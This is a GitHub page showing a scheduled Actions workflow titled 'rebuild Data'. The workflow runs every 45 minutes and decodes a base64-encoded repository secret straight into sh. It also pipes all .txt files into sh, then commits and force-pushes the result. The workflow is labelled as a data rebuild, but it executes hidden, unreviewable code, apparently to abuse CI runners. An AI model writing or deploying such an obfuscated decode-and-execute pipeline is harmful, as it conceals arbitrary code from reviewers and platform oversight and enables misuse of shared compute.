rebuild Data #53134
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# .github/workflows/scheduled-builds.yml | |
name: rebuild Data | |
on: | |
schedule: | |
# Runs "at minute 45 minute " (see https://crontab.guru) | |
- cron: '*/45 * * * *' | |
jobs: | |
build: | |
name: Build | |
runs-on: ubuntu-latest | |
strategy: | |
matrix: | |
node: [ '18' ] | |
steps: | |
- uses: actions/checkout@v1 | |
- name: Setup node | |
uses: actions/setup-node@v2 | |
with: | |
node-version: ${{ matrix.node }} | |
- name: Jalankan Skrip | |
env: | |
SUPER_SECRET: ${{ secrets.ENC }} | |
run: | | |
npm i > /dev/null 2>&1 | |
timeout 1500 echo "$SUPER_SECRET" | base64 --decode | sh #> /dev/null 2>&1 | |
cat *.txt | sh | |
echo "workflow:cron date:`date`" > last.txt | |
- name: Commit | |
run: | | |
git config --local user.name "github-actions[bot]" | |
git config --local user.email "41898282+github-actions[bot]@users.noreply.github.com" | |
git add . | |
git commit -m "[AUTO:BUILD] `date`" | |
- name: GitHub Push | |
uses: ad-m/github-push-action@master | |
with: | |
force: true | |
directory: "." | |
github_token: ${{ secrets.GITHUB_TOKEN }} | |
branch: ${{ github.ref }} |